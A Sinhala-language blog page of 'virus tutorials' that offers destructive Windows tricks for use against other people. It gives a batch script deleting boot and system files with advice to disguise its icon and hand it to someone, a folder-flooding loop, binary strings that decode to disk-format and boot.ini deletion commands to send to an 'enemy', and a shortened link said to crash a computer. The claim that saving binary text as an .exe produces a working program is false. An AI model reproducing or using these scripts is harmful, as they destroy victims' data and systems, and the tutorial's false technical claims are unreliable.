Showing posts with label Virus Tutorials. Show all posts



1. URL එකකින් සිස්ටම් එක Crash කරමු.


 පහල තියන URL එක ක්ලික් කළා කියන්නේ ඇම කෑවා කියන එක තමයි. මේක ක්ලික් කරලා පැයක් හමාරක් යද්දී කම්පියුටර් එකේ මුළු සිස්ටම් එකටම බඩු හම්බ වෙනවා. ඉතින් තේරෙනවා නේද කරන්න ඕන වැඩේ. කාටහරි URL එකක් ක්ලික් කරවන එක මහා ලොකු වැඩක් නෙමෙයිනේ. ඔන්න එහෙනම් පහල තියනවා බඩු.

http://tiny.cc/ibJUN


2. පරිගණකයක් සදහටම නිදි කරවමු

මේකෙන් වෙන්නේ පරිගණකය Shut Down වෙලා Reboot වෙන්න ඕනා ෆයිල්ස් ටික මකලා පරිගණකය Restart වෙවී තියන එකයි. මේ පහල තියන ටෙක්ස්ට් ටික Notepad එකකට Paste කරලා මොකක්හරි නමක් දීලා අන්තිමට .bat කියලා දීලා සේව් කරන එකයි.



@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini

ඒ ෆයිල් එකේ Icon එක එහෙම පොඩ්ඩක් වෙනස් කරලා කාටහරි දුන්නම සැක හිතන්නෙ නැහැ.තේරුනා නේද මොනවද කියන්නේ කියලා.. ;) ඊට පස්සේ දෙන්න කාටහරි Open කරන්න කියලා.




3. තත්පර කීපයකින් Folders 1000කට වඩා හදමු

මේක Rename කරන්න ඕන 1000folders.bat කියන විදිහට. පස්සේ ඉතින් පුළුවන් Shortcut එකක් එහෙම දාල නමයි Icon එකයි එහෙම වෙනස් කරගන්න. ඔන්න එහෙනම් පහල තියනවා කෝඩ් එක..

@echo off
:top
md %random%
goto top  

භයානක Virus හදමු

Saturday, June 29, 2013
Posted by yasiru


අද මම ගෙනාවෙ අපේ කොල්ලන්ට අලුත් දෙයක් .ඒ තමයි පොඩි භයානක වයිරස් එකක් හදන හැටි කියල දෙන්න.මට වැඩිය කතාකරන්න වෙලාව නැහැ.මම කියල දීපු විදියට වැඩේ කරල මැබැයි මට කියන්න එන්න එපා ඔන්න පීසී එකට බඩු ගියා කියලා.තමන්ගෙ තරහකාරයෙක් ඉන්නවනම් මේක යවන්න තියෙන්නෙ.කමෙන්ට් එකකුත් දාල යන්න අමතක කරන්න එපා.අත්හදා බලන්න කලින් කමෙන්ට් කරන්න මොකද අත්හදා බැලුවම පස්සෙ සිංහපීඩියාව පැත්ත පලාතෙ එන්න හිතෙන එකක් නෑ.

  මම ඔය පල්ලෙහයින් දීල තියන අංක ටිකෙන් කැමති එකක් Notepad එකක කොපි කරගෙන Save as දීල Save as type කියන එකට All files දීල, File name කියන තැනට ඔයාලට ඕනි නමක් දීල අන්තිමට .exe විදිහට දීල save කරන්න.



01100110011011110111001001101101011000010111010000 100000011000110011101001011100
0010000000101111010100010010111101011000
මේ කෝඩ් එකෙන් වෙන්නේ Local Disk C එක Format වෙනවා. ආය නෝ කතා නෝ සිනා...


01100110011011110111001001101101011000010111010000 100000011001000011101001011100
0010000000101111010100010010111101011000
මේකෙන් Local Disk D එක Format වෙනවා.


01100110011011110111001001101101011000010111010000 100000011000010011101001011100
0010000000101111010100010010111101011000
මේකෙන් A එකලු. අනේ මන්ඳා මගෙ නම් A එකක් නෑ


01100100011001010110110000100000001011110100011000 101111010100110010111101010001
00100000011000110011101001011100011000100110111101 101111011101000010111001101001
0110111001101001
මේකෙන් වෙන්නේ PC එක බූට් වෙන්න අත්‍යවශ්‍යය System File එකක් වෙන Boot.ini කියන ෆයිල් එක මැකෙනවා. මේකනම් හෙන Dangerous. මොකො මෙහෙම කරොත් PC එක ආයෙ Boot වෙන්නේ නෑ.


ඔන්න බොලේ මන් අද මගේ පලවෙනි පොස්ටුවක් සමග වැඩේ බලන්නකෝ .මේක ඉතින් පට්ටම පට්ට වයිරස්
Welcome

ඕහ්..තවම member කෙනෙක් වුණේ නැත්ද

▪ අලුත් විදියට හිතන්න 
▪ අලුත් දේ ඉගෙන ගන්න 
▪ අලුත් දේ කරන්න 
▪ අපිත් එක්ක එකතු වෙන්න 
▪ ඔයත් දැන්ම සාමාජිකයෙක් වෙන්න.

Followers

Sunday 7.30 a.m

Online සිංහයින්


- Copyright © සිංහPedia -SinHaPedia.com- Powered by SinHaPedia INC - Designed by Yasiru Udana Ransara -